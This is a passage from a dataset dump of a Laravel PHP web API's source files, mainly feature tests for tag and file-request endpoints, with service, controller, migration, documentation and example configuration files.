$event->getDescription() === 'Viewed all tags.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_cannot_store(): void\n {\n $response = $this->postJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n $now = Date::now();\n Date::setTestNow($now);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertJsonFragment([\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n 'public_contributions_count' => 0,\n 'created_at' => $now->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function can_have_second_level_tag_for_store(): void\n {\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n $response->assertJsonFragment([\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'Child tag',\n 'public_contributions_count' => 0,\n ]);\n }\n\n /** @test */\n public function cannot_have_third_level_tag_for_store(): void\n {\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create([\n 'parent_tag_id' => factory(Tag::class)->create()->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('parent_tag_id');\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $tag = Tag::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($tag, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function guest_can_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertJsonStructure([\n 'data' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertJson([\n 'data' => [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/tags/{$tag->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $tag): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Destroy.\n */\n\n /** @test */\n public function guest_cannot_destroy(): void\n {\n $tag = factory(Tag::class)->create();\n\n $response = $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_destroy(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_destroy(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function database_records_and_relationships_deleted_for_force_destroy(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $this->assertDatabaseMissing('tags', ['id' => $tag->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n }\n\n /** @test */\n public function database_records_and_relationships_not_deleted_for_soft_destroy(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'soft_delete']);\n\n $this->assertSoftDeleted('tags', ['id' => $tag->id]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_force_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($user);\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $tag): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Force deleted tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_soft_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($user);\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'soft_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $tag): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Soft deleted tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5490883588790894,
"alphanum_fraction": 0.5536465644836426,
"avg_line_length": 25.90566062927246,
"blob_id": "524b7d3c913eb8dd02566135cfd7a4f56748961e",
"content_id": "70a8bdb06ae9e758f9feb48d30e2a4209f4e9be0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2852,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 106,
"path": "/tests/Feature/V1/File/RequestControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\File;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass RequestControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertResourceDataStructure([\n 'token',\n 'download_url',\n 'expires_at',\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_request(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->postJson(\"/v1/files/{$file->id}/request\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $file): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Requested file [{$file->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6593406796455383,
"alphanum_fraction": 0.6703296899795532,
"avg_line_length": 8.100000381469727,
"blob_id": "adcd5cb6f954e0bd48c59df23526ae320b827291",
"content_id": "6c2b2ea296606c73a5948dbc977628c1795d8e0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 91,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/UserScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait UserScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5139240622520447,
"alphanum_fraction": 0.5151898860931396,
"avg_line_length": 22.939393997192383,
"blob_id": "1b6f952d79e5f5dade52aa402969612539b7b89d",
"content_id": "e27061db71dcaf94329bad1af58f73bdf8576ac7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 790,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 33,
"path": "/app/Services/AuditService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Audit\\AuditCreated;\nuse App\\Models\\Audit;\n\nclass AuditService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\Audit\n */\n public function create(array $data): Audit\n {\n /** @var \\App\\Models\\Audit $audit */\n $audit = Audit::create([\n 'user_id' => $data['user_id'] ?? null,\n 'client_id' => $data['client_id'] ?? null,\n 'action' => $data['action'],\n 'description' => $data['description'] ?? null,\n 'ip_address' => $data['ip_address'],\n 'user_agent' => $data['user_agent'] ?? null,\n 'created_at' => $data['created_at'],\n ]);\n\n event(new AuditCreated($audit));\n\n return $audit;\n }\n}\n"
},
{
"alpha_fraction": 0.6454545259475708,
"alphanum_fraction": 0.6465908885002136,
"avg_line_length": 24.14285659790039,
"blob_id": "1a67988e30dc81a8da74a314ef4ee78ab81ece2a",
"content_id": "db96b47b840c8477a28b1a9f28fa7bcdeb30ab95",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 880,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 35,
"path": "/database/migrations/2019_05_28_171238_create_contribution_statuses_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateContributionStatusesTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('contribution_statuses', function (Blueprint $table): void {\n $table->string('status')->primary();\n });\n\n $contributionStatusesPath = realpath(dirname(__DIR__)) . '/storage/contribution_statuses.json';\n\n DB::table('contribution_statuses')->insert(\n json_decode(file_get_contents($contributionStatusesPath), true)\n );\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('contribution_statuses');\n }\n}\n"
},
{
"alpha_fraction": 0.7564338445663452,
"alphanum_fraction": 0.779411792755127,
"avg_line_length": 17.440677642822266,
"blob_id": "cd3c5a3bfc21400937b8dcadaa175057be400b1e",
"content_id": "7ea57d8d5fc2e9cfe8ac113cc95dd22b99b9a07a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1088,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 59,
"path": "/.env.example",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Application environment.\nAPP_ENV=local\n# Encryption key.\nAPP_KEY=\n# If debug mode should be enabled.\nAPP_DEBUG=true\n# The application URL, needed when using the CLI.\nAPP_URL=http://localhost\n# The frontend web app URL.\nFRONTEND_URL=\n# The admin web app URL.\nADMIN_URL=http://localhost:3000\n\n# Logging config.\nLOG_CHANNEL=single\n\n# Database config.\nDB_HOST=mysql\nDB_PORT=3306\nDB_DATABASE=connecting_voices\nDB_USERNAME=connecting_voices\nDB_PASSWORD=secret\n\n# Cache config.\nCACHE_DRIVER=redis\n# Redis credentials.\nREDIS_HOST=redis\nREDIS_PASSWORD=null\nREDIS_PORT=6379\n\n# Queue config.\nQUEUE_CONNECTION=database\n\n# Session config.\nSESSION_DRIVER=database\nSESSION_LIFETIME=120\n\n# Email config.\nMAIL_DRIVER=log\nMAIL_HOST=smtp.mailtrap.io\nMAIL_PORT=2525\nMAIL_USERNAME=null\nMAIL_PASSWORD=null\nMAIL_ENCRYPTION=null\n\n# SMS config.\nSMS_DRIVER=log\n\n# Filesystem config.\nFILESYSTEM_DRIVER=local\nFILESYSTEM_CLOUD=local_cloud\n# AWS S3 credentials.\nAWS_S3_ACCESS_KEY_ID=\nAWS_S3_SECRET_ACCESS_KEY=\nAWS_S3_DEFAULT_REGION=eu-west-1\nAWS_S3_BUCKET=\n\n# Authentication config.\nOTP_ENABLED=true\n"
},
{
"alpha_fraction": 0.6374269127845764,
"alphanum_fraction": 0.6382623314857483,
"avg_line_length": 31.351350784301758,
"blob_id": "273bfbff96dfca0f0345f47f3a02aa5b6687dcc8",
"content_id": "43111551d1921fe5af8b210e4316d83fd5651086",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1197,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 37,
"path": "/app/Docs/Paths/Tags/TagsNestedPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Tags;\n\nuse App\\Docs\\Operations\\Tags\\DestroyTagOperation;\nuse App\\Docs\\Operations\\Tags\\ShowTagOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass TagsNestedPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/tags/{tag}')\n ->parameters(\n Parameter::path()\n ->name('tag')\n ->description('The ID of the tag')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ShowTagOperation::create(),\n DestroyTagOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6647972464561462,
"alphanum_fraction": 0.66566002368927,
"avg_line_length": 30.75342559814453,
"blob_id": "4b19ee0dd09f37788272419fc34344ff3e143ca7",
"content_id": "79a6e0c612437b12fc94192d7d41af01f3cb1a5f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2318,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 73,
"path": "/app/Http/Controllers/V1/NotificationController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Notification\\AdminIdFilter;\nuse App\\Http\\Filters\\Notification\\EndUserIdFilter;\nuse App\\Http\\Resources\\NotificationResource;\nuse App\\Models\\Notification;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass NotificationController extends ApiController\n{\n /**\n * NotificationController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n $this->authorizeResource(Notification::class);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Notification::query()\n ->with('user.admin', 'user.endUser');\n\n $notifications = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n Filter::custom('admin_id', AdminIdFilter::class),\n Filter::custom('end_user_id', EndUserIdFilter::class),\n ])\n ->allowedSorts([\n 'created_at',\n ])\n ->defaultSort('-created_at')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all notifications.'));\n\n return NotificationResource::collection($notifications);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Notification $notification\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Notification $notification): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed notification [{$notification->id}].\"));\n\n return new NotificationResource($notification);\n }\n}\n"
},
{
"alpha_fraction": 0.5725429058074951,
"alphanum_fraction": 0.5741029381752014,
"avg_line_length": 20.366666793823242,
"blob_id": "8100e0eb5e7da77196b3d5e720cbf6b6e796b2b5",
"content_id": "17a4812f88a04e8cc608de671976d80f0cadeb48",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 641,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 30,
"path": "/app/Http/Requests/EndUser/DestroyEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass DestroyEndUserRequest extends FormRequest\n{\n const TYPE_SOFT_DELETE = 'soft_delete';\n const TYPE_FORCE_DELETE = 'force_delete';\n\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'type' => [\n 'bail',\n 'required',\n Rule::in([static::TYPE_SOFT_DELETE, static::TYPE_FORCE_DELETE]),\n ],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6459330320358276,
"alphanum_fraction": 0.6475279331207275,
"avg_line_length": 25.125,
"blob_id": "ea7420c0a1b66b063a9aa0f6f8e5562ca6dd3d4b",
"content_id": "7ee76e5858a1d9407b838cad87396a139a68648e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 627,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 24,
"path": "/app/Http/Filters/Admin/EmailFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Admin;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass EmailFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param string $email\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $email, string $property): Builder\n {\n return $query->whereHas('user', function (Builder $query) use ($email): void {\n $query->where('email', 'LIKE', \"%{$email}%\");\n });\n }\n}\n"
},
{
"alpha_fraction": 0.6868686676025391,
"alphanum_fraction": 0.6969696879386902,
"avg_line_length": 8.899999618530273,
"blob_id": "a75f837d67ea9736408aff20632795d6a5d457a9",
"content_id": "06ebb67b7cd42ca7a186104aabdb17d7ec65948c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 99,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/ContributionScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait ContributionScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5195488929748535,
"alphanum_fraction": 0.5203007459640503,
"avg_line_length": 20.11111068725586,
"blob_id": "1b72d8973b92a660db8f7bb1a35f5963888577eb",
"content_id": "fc83f3844c3f541528594f927156127a9b960b46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1330,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 63,
"path": "/app/Services/TagService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Tag\\TagCreated;\nuse App\\Events\\Tag\\TagForceDeleted;\nuse App\\Events\\Tag\\TagSoftDeleted;\nuse App\\Models\\Tag;\n\nclass TagService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\Tag\n */\n public function create(array $data): Tag\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = Tag::create([\n 'parent_tag_id' => $data['parent_tag_id'] ?? null,\n 'name' => $data['name'],\n ]);\n\n event(new TagCreated($tag));\n\n return $tag;\n }\n\n /**\n * @param \\App\\Models\\Tag $tag\n * @throws \\Exception\n * @return \\App\\Models\\Tag\n */\n public function softDelete(Tag $tag): Tag\n {\n $tag->delete();\n $tag->childTags()->each(function (Tag $tag): void {\n $tag->delete();\n });\n\n event(new TagSoftDeleted($tag));\n\n return $tag;\n }\n\n /**\n * @param \\App\\Models\\Tag $tag\n * @throws \\Exception\n */\n public function forceDelete(Tag $tag): void\n {\n $tag->contributions()->sync([]);\n $tag->childTags()->each(function (Tag $tag): void {\n $tag->contributions()->sync([]);\n $tag->forceDelete();\n });\n $tag->forceDelete();\n\n event(new TagForceDeleted($tag));\n }\n}\n"
},
{
"alpha_fraction": 0.679438054561615,
"alphanum_fraction": 0.6807152032852173,
"avg_line_length": 28,
"blob_id": "4775a6ad06e74b2e6193755c8ca606a5831f9ddc",
"content_id": "80c7c4b6f4533b2b559576e237358d7e01e146f3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 783,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 27,
"path": "/app/Docs/Paths/Admins/AdminsMePath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Admins;\n\nuse App\\Docs\\Operations\\Admins\\ShowAdminOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass AdminsMePath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/admins/me')\n ->operations(\n ShowAdminOperation::create()\n ->summary('Got the authenticated admin')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5835109949111938,
"alphanum_fraction": 0.5842217206954956,
"avg_line_length": 20,
"blob_id": "f875391c14059fa5805e2b08b40a60172a5fd677",
"content_id": "9b6e4b15c56795c778dfbde3f98e0887f37e66df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1407,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 67,
"path": "/app/Models/Setting.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
